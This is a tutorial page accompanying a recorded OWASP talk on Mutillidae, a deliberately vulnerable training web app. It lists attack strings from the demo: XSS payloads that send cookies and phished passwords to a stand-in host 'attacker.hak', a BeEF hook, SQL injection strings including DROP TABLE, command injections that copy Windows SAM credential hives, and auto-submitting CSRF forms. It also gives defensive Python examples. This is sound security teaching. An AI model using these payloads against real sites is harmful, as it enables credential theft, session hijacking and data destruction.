
OWASP Top 5 and Mutillidae: Intro to common web vulnerabilities like Cross Site Scripting (XSS), SQL/Command Injection Flaws, Malicious File Execution/RFI, Insecure Direct Object Reference and Cross Site Request Forgery (CSRF/XSRF) (Hacking Illustrated Series InfoSec Tutorial Videos)

    This is a recording of the presentation I gave to the Louisville Chapter of OWASP about the Mutillidae project. A while back I wanted to start covering more web application pen-testing tools and concepts in some of my videos and live classes, and for that I needed vulnerable web apps to illustrate common web security problems. I like the WebGoat project, but sometimes it's a little hard to figure out exactly what they want you to do to exploit a given lesson, and it's written in J2EE (not a layman-friendly language). To have something simple to use as a demo in my videos and in class, I started the Mutillidae project. This video covers the first 5 of the OWASP Top 10.

Slides can be found here


Owasp Louisville 2nd Meeting from Adrian Crenshaw on Vimeo. The AVI can be downloaded from the Vimeo site, but you will need to install the CamStudio codec to play it.


XSS code and other strings I injected in the video (provided here for easy copying and pasting):

Simple XSS:
<script>alert("XSS");</script>

Page Redirect XSS:
<script>window.location = "http://www.irongeek.com/"</script>

Cookie Stealing:
<script> new Image().src="http://attacker.hak/catch.php?cookie="+encodeURI(document.cookie); </script>

Password Con XSS:
<script>username=prompt('Please enter your username',' '); password=prompt('Please enter your password',' '); document.write("<img src=\"http://attacker.hak/catch.php?username="+username+"&password="+password+"\">"); </script>

More complicated, but better looking XSS password form:
<div style="position: absolute; width: 30%; z-index: 2; left: 35%; top: 40%; float:left; background-color:#C0C0C0" id="loginlayer"> <form method="POST" name="logonf" > <b>You must login to continue</b> <div align="center"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td>User:</td> <td><input name="userf" size="20"></td> </tr> <tr> <td>Password:</td> <td><input type="password" name="passwordf" size="20"></td> </tr> </table> </div> <p align="center"><input type="button" value="Submit" onClick="submitandhide()"></p> </form> <script> function submitandhide() { document.getElementById("loginlayer").style.display = "none"; temprs = "user=" + document.logonf.userf.value + "&password=" + document.logonf.passwordf.value; var iframe = document.createElement('IFRAME'); iframe.src = ("http://attacker.hak/catch.php?" + temprs); document.body.appendChild(iframe); //help from http://www.gnucitizen.org/blog/javascript-remoting-dangers/ } </script> </div>

Clippy XSS:
<div style="position:fixed; right:60px; bottom:10px; overflow:visible;" id="clippy"> <table valign="top" width="130" height="309" border="0" background="http://www.irongeek.com/images/clippy.png" cellpadding="10"> <tr><td valign="top">Hello, it looks like you have an XSS vulnerability, would you like <a href="http://www.owasp.org/index.php/Cross_site_scripting">some help fixing that?</a></td></tr> </table> </div>

External Javascript:
<script src="http://ha.ckers.org/xss.js"> </script>

Hot BeEF Injection:
<script language='Javascript' src='http://localhost/beef/hook/beefmagic.js.php'></script>

User Agent Example:
<useragentswitcher><useragent description="XSS Test" useragent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0 &lt;script&gt;window.location = &quot;http://www.irongeek.com/&quot;&lt;/script&gt;)" appname="Microsoft Internet Explorer" appversion="4.0 (compatible; MSIE 7.0; Windows NT 6.0)" platform="Win32" vendor="" vendorsub=""/></useragentswitcher>

SQL Injection Strings:
'
'; DROP TABLE owasp10; --
' or 1=1 --
' + password --
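Why the second and third strings above work, and what stops them, as an added example (not code from the presentation or from Mutillidae): the same login query built by string concatenation and as a parameterised query, run against an in-memory SQLite table with constructed sample rows.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample rows standing in for Mutillidae's accounts table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)",
                     [("admin", "adminpass"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    """String concatenation: user input becomes part of the SQL grammar,
    so the quote and the trailing -- comment rewrite the WHERE clause."""
    sql = ("SELECT username FROM accounts WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return sorted(row[0] for row in conn.execute(sql))


def login_safe(conn, username, password):
    """Parameterised query: the same input is bound as a plain string value
    and can never change the statement's structure."""
    sql = "SELECT username FROM accounts WHERE username = ? AND password = ?"
    return sorted(row[0] for row in conn.execute(sql, (username, password)))


def probe_raises(conn, login) -> bool:
    """True if the lone quote from the list above breaks the query. The fix is
    the parameterised form; the database error should also never be echoed
    back to the client, since that is what confirms the field is injectable."""
    try:
        login(conn, "'", "x")
        return False
    except sqlite3.OperationalError:
        return True


def demo():
    conn = make_db()
    payload = "' or 1=1 --"  # third string from the list above
    return {
        "vulnerable": login_vulnerable(conn, payload, "anything"),  # every account
        "safe": login_safe(conn, payload, "anything"),              # no match
        "normal": login_safe(conn, "bob", "hunter2"),               # ['bob']
    }
```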

Command Injection Strings:
&& dir
&& wmic process list
&& wmic useraccount list
&& copy c:\WINDOWS\repair\sam && copy c:\WINDOWS\repair\system.bak
&& copy C:\Windows\System32\config\RegBack\sam.old && copy C:\Windows\System32\config\RegBack\SYSTEM.OLD

File includes:
At the source viewer:
http://target.hak/index.php?page=source-viewer.php&php_file_name=config.inc

CSRF/XSRF Examples:

IMG get:
<img src="http://target.hak/index.php?page=add-to-your-blog.php&input_from_form=hi%20there%20monkeyboy">

IFRAME Get:
<iframe src="http://target.hak/index.php?page=add-to-your-blog.php&input_from_form=hi%20there%20monkeyboy" style="width:0px; height:0px; border: 0px"></iframe>

Post method:
<html> <body> <form name="csrfform" method="post" action="http://target.hak/index.php?page=add-to-your-blog.php"> <input type='hidden' name='input_from_form' value="Test of of auto submitted form."> </form> <script> document.csrfform.submit() </script> </body> </html>
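All three CSRF examples above succeed because the browser attaches the victim's session cookie automatically and nothing in the request proves it came from the site's own form. The standard fix is a per-session synchroniser token checked on every state-changing request; this is an added Python illustration (not Mutillidae's PHP, which is not shown on this page), with the session, form and blog store as constructed stand-ins.

```python
import hmac
import secrets


def issue_token(session: dict) -> str:
    """Store a random per-session token; the site embeds it as a hidden
    field in every form it renders, which a cross-site page cannot read."""
    token = secrets.token_hex(16)
    session["csrf_token"] = token
    return token


def handle_blog_post(session: dict, form: dict, blog: list) -> int:
    """Return an HTTP status for POST add-to-your-blog.php: 403 unless the
    submitted token matches the session's (constant-time compare)."""
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return 403
    blog.append(form.get("input_from_form", ""))
    return 200


def demo():
    blog = []
    session = {"user": "bob"}  # constructed: victim is logged in, cookie sent automatically
    token = issue_token(session)
    # The auto-submitted form above carries only input_from_form, no token.
    forged = {"input_from_form": "hi there monkeyboy"}
    forged_status = handle_blog_post(session, forged, blog)
    # A form rendered by the site itself includes the hidden token field.
    genuine = {"input_from_form": "my real post", "csrf_token": token}
    genuine_status = handle_blog_post(session, genuine, blog)
    return forged_status, genuine_status, blog
```

The IMG and IFRAME GET variants are covered by the same rule once the handler only accepts POST, since a GET carries no token and should never change state.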


Copyright 2014, IronGeek
Louisville / Kentuckiana Information Security Enthusiast